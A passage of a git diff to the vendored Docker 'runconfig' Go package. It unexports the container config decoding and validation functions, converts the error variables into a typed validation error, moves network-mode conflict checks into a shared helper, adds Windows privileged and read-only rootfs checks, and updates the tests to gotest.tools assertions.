rm.timeout) + if rm.timeout != defaultTimeout { + t.Fatalf("restart manager should have a timeout of 100 ms but has %s", rm.timeout) } } diff --git a/vendor/github.com/docker/docker/runconfig/config.go b/vendor/github.com/docker/docker/runconfig/config.go index 508681cfe0..cbacf47df3 100644 --- a/vendor/github.com/docker/docker/runconfig/config.go +++ b/vendor/github.com/docker/docker/runconfig/config.go @@ -1,14 +1,12 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "encoding/json" - "fmt" "io" "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/pkg/sysinfo" - "github.com/docker/docker/volume" ) // ContainerDecoder implements httputils.ContainerDecoder @@ -17,19 +15,19 @@ type ContainerDecoder struct{} // DecodeConfig makes ContainerDecoder to implement httputils.ContainerDecoder func (r ContainerDecoder) DecodeConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { - return DecodeContainerConfig(src) + return decodeContainerConfig(src) } // DecodeHostConfig makes ContainerDecoder to implement httputils.ContainerDecoder func (r ContainerDecoder) DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { - return DecodeHostConfig(src) + return decodeHostConfig(src) } -// DecodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper +// decodeContainerConfig decodes a json encoded config into a ContainerConfigWrapper // struct and returns both a Config and a HostConfig struct // Be aware this function is not checking whether the resulted structs are nil, // it's your business to do so -func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { +func decodeContainerConfig(src io.Reader) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { var w ContainerConfigWrapper decoder := json.NewDecoder(src) @@ -46,52 +44,38 @@ func DecodeContainerConfig(src io.Reader) (*container.Config, *container.HostCon if w.Config.Volumes == nil { w.Config.Volumes = make(map[string]struct{}) } - - // Now validate all the volumes and binds - if err := validateMountSettings(w.Config, hc); err != nil { - return nil, nil, nil, err - } } // Certain parameters need daemon-side validation that cannot be done // on the client, as only the daemon knows what is valid for the platform. - if err := ValidateNetMode(w.Config, hc); err != nil { + if err := validateNetMode(w.Config, hc); err != nil { return nil, nil, nil, err } // Validate isolation - if err := ValidateIsolation(hc); err != nil { + if err := validateIsolation(hc); err != nil { return nil, nil, nil, err } // Validate QoS - if err := ValidateQoS(hc); err != nil { + if err := validateQoS(hc); err != nil { return nil, nil, nil, err } // Validate Resources - if err := ValidateResources(hc, sysinfo.New(true)); err != nil { + if err := validateResources(hc, sysinfo.New(true)); err != nil { return nil, nil, nil, err } - return w.Config, hc, w.NetworkingConfig, nil -} - -// validateMountSettings validates each of the volumes and bind settings -// passed by the caller to ensure they are valid. -func validateMountSettings(c *container.Config, hc *container.HostConfig) error { - // it is ok to have len(hc.Mounts) > 0 && (len(hc.Binds) > 0 || len (c.Volumes) > 0 || len (hc.Tmpfs) > 0 ) - // Ensure all volumes and binds are valid. - for spec := range c.Volumes { - if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { - return fmt.Errorf("invalid volume spec %q: %v", spec, err) - } + // Validate Privileged + if err := validatePrivileged(hc); err != nil { + return nil, nil, nil, err } - for _, spec := range hc.Binds { - if _, err := volume.ParseMountRaw(spec, hc.VolumeDriver); err != nil { - return fmt.Errorf("invalid bind mount spec %q: %v", spec, err) - } + + // Validate ReadonlyRootfs + if err := validateReadonlyRootfs(hc); err != nil { + return nil, nil, nil, err } - return nil + return w.Config, hc, w.NetworkingConfig, nil } diff --git a/vendor/github.com/docker/docker/runconfig/config_test.go b/vendor/github.com/docker/docker/runconfig/config_test.go index f1f9de5950..67d386969f 100644 --- a/vendor/github.com/docker/docker/runconfig/config_test.go +++ b/vendor/github.com/docker/docker/runconfig/config_test.go @@ -1,4 +1,4 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "bytes" @@ -12,6 +12,8 @@ import ( "github.com/docker/docker/api/types/container" networktypes "github.com/docker/docker/api/types/network" "github.com/docker/docker/api/types/strslice" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) type f struct { @@ -26,11 +28,6 @@ func TestDecodeContainerConfig(t *testing.T) { image string ) - //TODO: Should run for Solaris - if runtime.GOOS == "solaris" { - t.Skip() - } - if runtime.GOOS != "windows" { image = "ubuntu" fixtures = []f{ @@ -51,7 +48,7 @@ func TestDecodeContainerConfig(t *testing.T) { t.Fatal(err) } - c, h, _, err := DecodeContainerConfig(bytes.NewReader(b)) + c, h, _, err := decodeContainerConfig(bytes.NewReader(b)) if err != nil { t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) } @@ -75,9 +72,9 @@ func TestDecodeContainerConfig(t *testing.T) { // as to what level of container isolation is supported. func TestDecodeContainerConfigIsolation(t *testing.T) { - // An invalid isolation level + // An Invalid isolation level if _, _, _, err := callDecodeContainerConfigIsolation("invalid"); err != nil { - if !strings.Contains(err.Error(), `invalid --isolation: "invalid"`) { + if !strings.Contains(err.Error(), `Invalid isolation: "invalid"`) { t.Fatal(err) } } @@ -99,7 +96,7 @@ func TestDecodeContainerConfigIsolation(t *testing.T) { } } else { if _, _, _, err := callDecodeContainerConfigIsolation("process"); err != nil { - if !strings.Contains(err.Error(), `invalid --isolation: "process"`) { + if !strings.Contains(err.Error(), `Invalid isolation: "process"`) { t.Fatal(err) } } @@ -112,7 +109,7 @@ func TestDecodeContainerConfigIsolation(t *testing.T) { } } else { if _, _, _, err := callDecodeContainerConfigIsolation("hyperv"); err != nil { - if !strings.Contains(err.Error(), `invalid --isolation: "hyperv"`) { + if !strings.Contains(err.Error(), `Invalid isolation: "hyperv"`) { t.Fatal(err) } } @@ -135,5 +132,59 @@ func callDecodeContainerConfigIsolation(isolation string) (*container.Config, *c if b, err = json.Marshal(w); err != nil { return nil, nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) } - return DecodeContainerConfig(bytes.NewReader(b)) + return decodeContainerConfig(bytes.NewReader(b)) +} + +type decodeConfigTestcase struct { + doc string + wrapper ContainerConfigWrapper + expectedErr string + expectedConfig *container.Config + expectedHostConfig *container.HostConfig + goos string +} + +func runDecodeContainerConfigTestCase(testcase decodeConfigTestcase) func(t *testing.T) { + return func(t *testing.T) { + raw := marshal(t, testcase.wrapper, testcase.doc) + config, hostConfig, _, err := decodeContainerConfig(bytes.NewReader(raw)) + if testcase.expectedErr != "" { + if !assert.Check(t, is.ErrorContains(err, "")) { + return + } + assert.Check(t, is.Contains(err.Error(), testcase.expectedErr)) + return + } + assert.Check(t, err) + assert.Check(t, is.DeepEqual(testcase.expectedConfig, config)) + assert.Check(t, is.DeepEqual(testcase.expectedHostConfig, hostConfig)) + } +} + +func marshal(t *testing.T, w ContainerConfigWrapper, doc string) []byte { + b, err := json.Marshal(w) + assert.NilError(t, err, "%s: failed to encode config wrapper", doc) + return b +} + +func containerWrapperWithVolume(volume string) ContainerConfigWrapper { + return ContainerConfigWrapper{ + Config: &container.Config{ + Volumes: map[string]struct{}{ + volume: {}, + }, + }, + HostConfig: &container.HostConfig{}, + } +} + +func containerWrapperWithBind(bind string) ContainerConfigWrapper { + return ContainerConfigWrapper{ + Config: &container.Config{ + Volumes: map[string]struct{}{}, + }, + HostConfig: &container.HostConfig{ + Binds: []string{bind}, + }, + } } diff --git a/vendor/github.com/docker/docker/runconfig/config_unix.go b/vendor/github.com/docker/docker/runconfig/config_unix.go index 4ccfc73be2..65e8d6fcd4 100644 --- a/vendor/github.com/docker/docker/runconfig/config_unix.go +++ b/vendor/github.com/docker/docker/runconfig/config_unix.go @@ -1,6 +1,6 @@ // +build !windows -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "github.com/docker/docker/api/types/container" @@ -53,7 +53,7 @@ func (w *ContainerConfigWrapper) getHostConfig() *container.HostConfig { // Make sure NetworkMode has an acceptable value. We do this to ensure // backwards compatible API behavior. - hc = SetDefaultNetModeIfBlank(hc) + SetDefaultNetModeIfBlank(hc) return hc } diff --git a/vendor/github.com/docker/docker/runconfig/config_windows.go b/vendor/github.com/docker/docker/runconfig/config_windows.go index f2361b554b..cced59d4df 100644 --- a/vendor/github.com/docker/docker/runconfig/config_windows.go +++ b/vendor/github.com/docker/docker/runconfig/config_windows.go @@ -1,4 +1,4 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "github.com/docker/docker/api/types/container" diff --git a/vendor/github.com/docker/docker/runconfig/errors.go b/vendor/github.com/docker/docker/runconfig/errors.go index bb72c1699c..038fe39660 100644 --- a/vendor/github.com/docker/docker/runconfig/errors.go +++ b/vendor/github.com/docker/docker/runconfig/errors.go @@ -1,46 +1,42 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" -import ( - "fmt" - - "github.com/docker/docker/api/errors" -) - -var ( +const ( // ErrConflictContainerNetworkAndLinks conflict between --net=container and links - ErrConflictContainerNetworkAndLinks = fmt.Errorf("Conflicting options: container type network can't be used with links. This would result in undefined behavior") - // ErrConflictUserDefinedNetworkAndLinks conflict between --net= and links - ErrConflictUserDefinedNetworkAndLinks = fmt.Errorf("Conflicting options: networking can't be used with links. This would result in undefined behavior") + ErrConflictContainerNetworkAndLinks validationError = "conflicting options: container type network can't be used with links. This would result in undefined behavior" // ErrConflictSharedNetwork conflict between private and other networks - ErrConflictSharedNetwork = fmt.Errorf("Container sharing network namespace with another container or host cannot be connected to any other network") + ErrConflictSharedNetwork validationError = "container sharing network namespace with another container or host cannot be connected to any other network" // ErrConflictHostNetwork conflict from being disconnected from host network or connected to host network. - ErrConflictHostNetwork = fmt.Errorf("Container cannot be disconnected from host network or connected to host network") + ErrConflictHostNetwork validationError = "container cannot be disconnected from host network or connected to host network" // ErrConflictNoNetwork conflict between private and other networks - ErrConflictNoNetwork = fmt.Errorf("Container cannot be connected to multiple networks with one of the networks in private (none) mode") + ErrConflictNoNetwork validationError = "container cannot be connected to multiple networks with one of the networks in private (none) mode" // ErrConflictNetworkAndDNS conflict between --dns and the network mode - ErrConflictNetworkAndDNS = fmt.Errorf("Conflicting options: dns and the network mode") + ErrConflictNetworkAndDNS validationError = "conflicting options: dns and the network mode" // ErrConflictNetworkHostname conflict between the hostname and the network mode - ErrConflictNetworkHostname = fmt.Errorf("Conflicting options: hostname and the network mode") + ErrConflictNetworkHostname validationError = "conflicting options: hostname and the network mode" // ErrConflictHostNetworkAndLinks conflict between --net=host and links - ErrConflictHostNetworkAndLinks = fmt.Errorf("Conflicting options: host type networking can't be used with links. This would result in undefined behavior") + ErrConflictHostNetworkAndLinks validationError = "conflicting options: host type networking can't be used with links. This would result in undefined behavior" // ErrConflictContainerNetworkAndMac conflict between the mac address and the network mode - ErrConflictContainerNetworkAndMac = fmt.Errorf("Conflicting options: mac-address and the network mode") + ErrConflictContainerNetworkAndMac validationError = "conflicting options: mac-address and the network mode" // ErrConflictNetworkHosts conflict between add-host and the network mode - ErrConflictNetworkHosts = fmt.Errorf("Conflicting options: custom host-to-IP mapping and the network mode") + ErrConflictNetworkHosts validationError = "conflicting options: custom host-to-IP mapping and the network mode" // ErrConflictNetworkPublishPorts conflict between the publish options and the network mode - ErrConflictNetworkPublishPorts = fmt.Errorf("Conflicting options: port publishing and the container type network mode") + ErrConflictNetworkPublishPorts validationError = "conflicting options: port publishing and the container type network mode" // ErrConflictNetworkExposePorts conflict between the expose option and the network mode - ErrConflictNetworkExposePorts = fmt.Errorf("Conflicting options: port exposing and the container type network mode") + ErrConflictNetworkExposePorts validationError = "conflicting options: port exposing and the container type network mode" // ErrUnsupportedNetworkAndIP conflict between network mode and requested ip address - ErrUnsupportedNetworkAndIP = fmt.Errorf("User specified IP address is supported on user defined networks only") + ErrUnsupportedNetworkAndIP validationError = "user specified IP address is supported on user defined networks only" // ErrUnsupportedNetworkNoSubnetAndIP conflict between network with no configured subnet and requested ip address - ErrUnsupportedNetworkNoSubnetAndIP = fmt.Errorf("User specified IP address is supported only when connecting to networks with user configured subnets") + ErrUnsupportedNetworkNoSubnetAndIP validationError = "user specified IP address is supported only when connecting to networks with user configured subnets" // ErrUnsupportedNetworkAndAlias conflict between network mode and alias - ErrUnsupportedNetworkAndAlias = fmt.Errorf("Network-scoped alias is supported only for containers in user defined networks") + ErrUnsupportedNetworkAndAlias validationError = "network-scoped alias is supported only for containers in user defined networks" // ErrConflictUTSHostname conflict between the hostname and the UTS mode - ErrConflictUTSHostname = fmt.Errorf("Conflicting options: hostname and the UTS mode") + ErrConflictUTSHostname validationError = "conflicting options: hostname and the UTS mode" ) -func conflictError(err error) error { - return errors.NewRequestConflictError(err) +type validationError string + +func (e validationError) Error() string { + return string(e) } + +func (e validationError) InvalidParameter() {} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig.go b/vendor/github.com/docker/docker/runconfig/hostconfig.go index 2b81d02c20..7d99e5acfa 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig.go @@ -1,15 +1,16 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "encoding/json" "io" + "strings" "github.com/docker/docker/api/types/container" ) // DecodeHostConfig creates a HostConfig based on the specified Reader. // It assumes the content of the reader will be JSON, and decodes it. -func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { +func decodeHostConfig(src io.Reader) (*container.HostConfig, error) { decoder := json.NewDecoder(src) var w ContainerConfigWrapper @@ -25,11 +26,54 @@ func DecodeHostConfig(src io.Reader) (*container.HostConfig, error) { // to default if it is not populated. This ensures backwards compatibility after // the validation of the network mode was moved from the docker CLI to the // docker daemon. -func SetDefaultNetModeIfBlank(hc *container.HostConfig) *container.HostConfig { +func SetDefaultNetModeIfBlank(hc *container.HostConfig) { if hc != nil { if hc.NetworkMode == container.NetworkMode("") { hc.NetworkMode = container.NetworkMode("default") } } - return hc +} + +// validateNetContainerMode ensures that the various combinations of requested +// network settings wrt container mode are valid. +func validateNetContainerMode(c *container.Config, hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + parts := strings.Split(string(hc.NetworkMode), ":") + if parts[0] == "container" { + if len(parts) < 2 || parts[1] == "" { + return validationError("Invalid network mode: invalid container format container:") + } + } + + if hc.NetworkMode.IsContainer() && c.Hostname != "" { + return ErrConflictNetworkHostname + } + + if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 { + return ErrConflictContainerNetworkAndLinks + } + + if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 { + return ErrConflictNetworkAndDNS + } + + if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 { + return ErrConflictNetworkHosts + } + + if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" { + return ErrConflictContainerNetworkAndMac + } + + if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts) { + return ErrConflictNetworkPublishPorts + } + + if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 { + return ErrConflictNetworkExposePorts + } + return nil } diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go b/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go deleted file mode 100644 index 83ad32ecc7..0000000000 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_solaris.go +++ /dev/null @@ -1,41 +0,0 @@ -package runconfig - -import ( - "github.com/docker/docker/api/types/container" - "github.com/docker/docker/pkg/sysinfo" -) - -// DefaultDaemonNetworkMode returns the default network stack the daemon should -// use. -func DefaultDaemonNetworkMode() container.NetworkMode { - return container.NetworkMode("bridge") -} - -// IsPreDefinedNetwork indicates if a network is predefined by the daemon -func IsPreDefinedNetwork(network string) bool { - return false -} - -// ValidateNetMode ensures that the various combinations of requested -// network settings are valid. -func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { - // We may not be passed a host config, such as in the case of docker commit - return nil -} - -// ValidateIsolation performs platform specific validation of the -// isolation level in the hostconfig structure. -// This setting is currently discarded for Solaris so this is a no-op. -func ValidateIsolation(hc *container.HostConfig) error { - return nil -} - -// ValidateQoS performs platform specific validation of the QoS settings -func ValidateQoS(hc *container.HostConfig) error { - return nil -} - -// ValidateResources performs platform specific validation of the resource settings -func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { - return nil -} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go index a6a2b34fc1..b04cbc6bc3 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_test.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_test.go @@ -1,6 +1,6 @@ // +build !windows -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "bytes" @@ -10,6 +10,8 @@ import ( "github.com/docker/docker/api/types/container" "github.com/docker/docker/pkg/sysinfo" + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) // TODO Windows: This will need addressing for a Windows daemon. @@ -61,43 +63,33 @@ func TestNetworkModeTest(t *testing.T) { } func TestIpcModeTest(t *testing.T) { - ipcModes := map[container.IpcMode][]bool{ - // private, host, container, valid - "": {true, false, false, true}, - "something:weird": {true, false, false, false}, - ":weird": {true, false, false, true}, - "host": {false, true, false, true}, - "container:name": {false, false, true, true}, - "container:name:something": {false, false, true, false}, - "container:": {false, false, true, false}, + ipcModes := map[container.IpcMode]struct { + private bool + host bool + container bool + shareable bool + valid bool + ctrName string + }{ + "": {valid: true}, + "private": {private: true, valid: true}, + "something:weird": {}, + ":weird": {}, + "host": {host: true, valid: true}, + "container": {}, + "container:": {container: true, valid: true, ctrName: ""}, + "container:name": {container: true, valid: true, ctrName: "name"}, + "container:name1:name2": {container: true, valid: true, ctrName: "name1:name2"}, + "shareable": {shareable: true, valid: true}, } + for ipcMode, state := range ipcModes { - if ipcMode.IsPrivate() != state[0] { - t.Fatalf("IpcMode.IsPrivate for %v should have been %v but was %v", ipcMode, state[0], ipcMode.IsPrivate()) - } - if ipcMode.IsHost() != state[1] { - t.Fatalf("IpcMode.IsHost for %v should have been %v but was %v", ipcMode, state[1], ipcMode.IsHost()) - } - if ipcMode.IsContainer() != state[2] { - t.Fatalf("IpcMode.IsContainer for %v should have been %v but was %v", ipcMode, state[2], ipcMode.IsContainer()) - } - if ipcMode.Valid() != state[3] { - t.Fatalf("IpcMode.Valid for %v should have been %v but was %v", ipcMode, state[3], ipcMode.Valid()) - } - } - containerIpcModes := map[container.IpcMode]string{ - "": "", - "something": "", - "something:weird": "weird", - "container": "", - "container:": "", - "container:name": "name", - "container:name1:name2": "name1:name2", - } - for ipcMode, container := range containerIpcModes { - if ipcMode.Container() != container { - t.Fatalf("Expected %v for %v but was %v", container, ipcMode, ipcMode.Container()) - } + assert.Check(t, is.Equal(state.private, ipcMode.IsPrivate()), "IpcMode.IsPrivate() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.host, ipcMode.IsHost()), "IpcMode.IsHost() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.container, ipcMode.IsContainer()), "IpcMode.IsContainer() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.shareable, ipcMode.IsShareable()), "IpcMode.IsShareable() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.valid, ipcMode.Valid()), "IpcMode.Valid() parsing failed for %q", ipcMode) + assert.Check(t, is.Equal(state.ctrName, ipcMode.Container()), "IpcMode.Container() parsing failed for %q", ipcMode) } } @@ -167,11 +159,11 @@ func TestPidModeTest(t *testing.T) { func TestRestartPolicy(t *testing.T) { restartPolicies := map[container.RestartPolicy][]bool{ // none, always, failure - container.RestartPolicy{}: {true, false, false}, - container.RestartPolicy{"something", 0}: {false, false, false}, - container.RestartPolicy{"no", 0}: {true, false, false}, - container.RestartPolicy{"always", 0}: {false, true, false}, - container.RestartPolicy{"on-failure", 0}: {false, false, true}, + {}: {true, false, false}, + {Name: "something", MaximumRetryCount: 0}: {false, false, false}, + {Name: "no", MaximumRetryCount: 0}: {true, false, false}, + {Name: "always", MaximumRetryCount: 0}: {false, true, false}, + {Name: "on-failure", MaximumRetryCount: 0}: {false, false, true}, } for restartPolicy, state := range restartPolicies { if restartPolicy.IsNone() != state[0] { @@ -199,14 +191,12 @@ func TestDecodeHostConfig(t *testing.T) { t.Fatal(err) } - c, err := DecodeHostConfig(bytes.NewReader(b)) + c, err := decodeHostConfig(bytes.NewReader(b)) if err != nil { t.Fatal(fmt.Errorf("Error parsing %s: %v", f, err)) } - if c.Privileged != false { - t.Fatalf("Expected privileged false, found %v\n", c.Privileged) - } + assert.Check(t, !c.Privileged) if l := len(c.Binds); l != 1 { t.Fatalf("Expected 1 bind, found %d\n", l) @@ -217,7 +207,7 @@ func TestDecodeHostConfig(t *testing.T) { } if len(c.CapDrop) != 1 && c.CapDrop[0] != "NET_ADMIN" { - t.Fatalf("Expected CapDrop MKNOD, got %v", c.CapDrop) + t.Fatalf("Expected CapDrop NET_ADMIN, got %v", c.CapDrop) } } } @@ -276,7 +266,7 @@ func TestValidateResources(t *testing.T) { si.CPURealtimePeriod = rt.SysInfoCPURealtimePeriod si.CPURealtimeRuntime = rt.SysInfoCPURealtimeRuntime - if err := ValidateResources(&hc, &si); (err != nil) != rt.ErrorExpected { + if err := validateResources(&hc, &si); (err != nil) != rt.ErrorExpected { t.Fatal(rt.FailureMsg, err) } } diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go index 6e2b7f5ff7..e579b06d9b 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_unix.go @@ -1,11 +1,10 @@ -// +build !windows,!solaris +// +build !windows -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "fmt" "runtime" - "strings" "github.com/docker/docker/api/types/container" "github.com/docker/docker/pkg/sysinfo" @@ -20,25 +19,20 @@ func DefaultDaemonNetworkMode() container.NetworkMode { // IsPreDefinedNetwork indicates if a network is predefined by the daemon func IsPreDefinedNetwork(network string) bool { n := container.NetworkMode(network) - return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() || network == "ingress" + return n.IsBridge() || n.IsHost() || n.IsNone() || n.IsDefault() } -// ValidateNetMode ensures that the various combinations of requested +// validateNetMode ensures that the various combinations of requested // network settings are valid. -func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { +func validateNetMode(c *container.Config, hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } - parts := strings.Split(string(hc.NetworkMode), ":") - if parts[0] == "container" { - if len(parts) < 2 || parts[1] == "" { - return fmt.Errorf("--net: invalid net mode: invalid container format container:") - } - } - if hc.NetworkMode.IsContainer() && c.Hostname != "" { - return ErrConflictNetworkHostname + err := validateNetContainerMode(c, hc) + if err != nil { + return err } if hc.UTSMode.IsHost() && c.Hostname != "" { @@ -49,81 +43,68 @@ func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { return ErrConflictHostNetworkAndLinks } - if hc.NetworkMode.IsContainer() && len(hc.Links) > 0 { - return ErrConflictContainerNetworkAndLinks - } - - if hc.NetworkMode.IsContainer() && len(hc.DNS) > 0 { - return ErrConflictNetworkAndDNS - } - - if hc.NetworkMode.IsContainer() && len(hc.ExtraHosts) > 0 { - return ErrConflictNetworkHosts - } - - if (hc.NetworkMode.IsContainer() || hc.NetworkMode.IsHost()) && c.MacAddress != "" { - return ErrConflictContainerNetworkAndMac - } - - if hc.NetworkMode.IsContainer() && (len(hc.PortBindings) > 0 || hc.PublishAllPorts == true) { - return ErrConflictNetworkPublishPorts - } - - if hc.NetworkMode.IsContainer() && len(c.ExposedPorts) > 0 { - return ErrConflictNetworkExposePorts - } return nil } -// ValidateIsolation performs platform specific validation of +// validateIsolation performs platform specific validation of // isolation in the hostconfig structure. Linux only supports "default" // which is LXC container isolation -func ValidateIsolation(hc *container.HostConfig) error { +func validateIsolation(hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if !hc.Isolation.IsValid() { - return fmt.Errorf("invalid --isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS) + return fmt.Errorf("Invalid isolation: %q - %s only supports 'default'", hc.Isolation, runtime.GOOS) } return nil } -// ValidateQoS performs platform specific validation of the QoS settings -func ValidateQoS(hc *container.HostConfig) error { +// validateQoS performs platform specific validation of the QoS settings +func validateQoS(hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if hc.IOMaximumBandwidth != 0 { - return fmt.Errorf("invalid QoS settings: %s does not support --io-maxbandwidth", runtime.GOOS) + return fmt.Errorf("Invalid QoS settings: %s does not support configuration of maximum bandwidth", runtime.GOOS) } if hc.IOMaximumIOps != 0 { - return fmt.Errorf("invalid QoS settings: %s does not support --io-maxiops", runtime.GOOS) + return fmt.Errorf("Invalid QoS settings: %s does not support configuration of maximum IOPs", runtime.GOOS) } return nil } -// ValidateResources performs platform specific validation of the resource settings +// validateResources performs platform specific validation of the resource settings // cpu-rt-runtime and cpu-rt-period can not be greater than their parent, cpu-rt-runtime requires sys_nice -func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { +func validateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if hc.Resources.CPURealtimePeriod > 0 && !si.CPURealtimePeriod { - return fmt.Errorf("invalid --cpu-rt-period: Your kernel does not support cgroup rt period") + return fmt.Errorf("Your kernel does not support cgroup cpu real-time period") } if hc.Resources.CPURealtimeRuntime > 0 && !si.CPURealtimeRuntime { - return fmt.Errorf("invalid --cpu-rt-runtime: Your kernel does not support cgroup rt runtime") + return fmt.Errorf("Your kernel does not support cgroup cpu real-time runtime") } if hc.Resources.CPURealtimePeriod != 0 && hc.Resources.CPURealtimeRuntime != 0 && hc.Resources.CPURealtimeRuntime > hc.Resources.CPURealtimePeriod { - return fmt.Errorf("invalid --cpu-rt-runtime: rt runtime cannot be higher than rt period") + return fmt.Errorf("cpu real-time runtime cannot be higher than cpu real-time period") } return nil } + +// validatePrivileged performs platform specific validation of the Privileged setting +func validatePrivileged(hc *container.HostConfig) error { + return nil +} + +// validateReadonlyRootfs performs platform specific validation of the ReadonlyRootfs setting +func validateReadonlyRootfs(hc *container.HostConfig) error { + return nil +} diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go index 91bd6dcc3c..33a4668af1 100644 --- a/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go +++ b/vendor/github.com/docker/docker/runconfig/hostconfig_windows.go @@ -1,8 +1,7 @@ -package runconfig +package runconfig // import "github.com/docker/docker/runconfig" import ( "fmt" - "strings" "github.com/docker/docker/api/types/container" "github.com/docker/docker/pkg/sysinfo" @@ -19,50 +18,79 @@ func IsPreDefinedNetwork(network string) bool { return !container.NetworkMode(network).IsUserDefined() } -// ValidateNetMode ensures that the various combinations of requested +// validateNetMode ensures that the various combinations of requested // network settings are valid. -func ValidateNetMode(c *container.Config, hc *container.HostConfig) error { +func validateNetMode(c *container.Config, hc *container.HostConfig) error { if hc == nil { return nil } - parts := strings.Split(string(hc.NetworkMode), ":") - if len(parts) > 1 { - return fmt.Errorf("invalid --net: %s", hc.NetworkMode) + + err := validateNetContainerMode(c, hc) + if err != nil { + return err + } + + if hc.NetworkMode.IsContainer() && hc.Isolation.IsHyperV() { + return fmt.Errorf("Using the network stack of another container is not supported while using Hyper-V Containers") } + return nil } -// ValidateIsolation performs platform specific validation of the +// validateIsolation performs platform specific validation of the // isolation in the hostconfig structure. Windows supports 'default' (or // blank), 'process', or 'hyperv'. -func ValidateIsolation(hc *container.HostConfig) error { +func validateIsolation(hc *container.HostConfig) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } if !hc.Isolation.IsValid() { - return fmt.Errorf("invalid --isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation) + return fmt.Errorf("Invalid isolation: %q. Windows supports 'default', 'process', or 'hyperv'", hc.Isolation) } return nil } -// ValidateQoS performs platform specific validation of the Qos settings -func ValidateQoS(hc *container.HostConfig) error { +// validateQoS performs platform specific validation of the Qos settings +func validateQoS(hc *container.HostConfig) error { return nil } -// ValidateResources performs platform specific validation of the resource settings -func ValidateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { +// validateResources performs platform specific validation of the resource settings +func validateResources(hc *container.HostConfig, si *sysinfo.SysInfo) error { // We may not be passed a host config, such as in the case of docker commit if hc == nil { return nil } - if hc.Resources.CPURealtimePeriod != 0 { - return fmt.Errorf("invalid --cpu-rt-period: Windows does not support this feature") + return fmt.Errorf("Windows does not support CPU real-time period") } if hc.Resources.CPURealtimeRuntime != 0 { - return fmt.Errorf("invalid --cpu-rt-runtime: Windows does not support this feature") + return fmt.Errorf("Windows does not support CPU real-time runtime") + } + return nil +} + +// validatePrivileged performs platform specific validation of the Privileged setting +func validatePrivileged(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if hc.Privileged { + return fmt.Errorf("Windows does not support privileged mode") + } + return nil +} + +// validateReadonlyRootfs performs platform specific validation of the ReadonlyRootfs setting +func validateReadonlyRootfs(hc *container.HostConfig) error { + // We may not be passed a host config, such as in the case of docker commit + if hc == nil { + return nil + } + if hc.ReadonlyRootfs { + return fmt.Errorf("Windows does not support root filesystem in read-only mode") } return nil } diff --git a/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go b/vendor/github.com/docker/docker/runconfig/hostconfig_windows_test.go new file mode 100644 index 0000000000..d7a480f313 --- /dev/null +++ 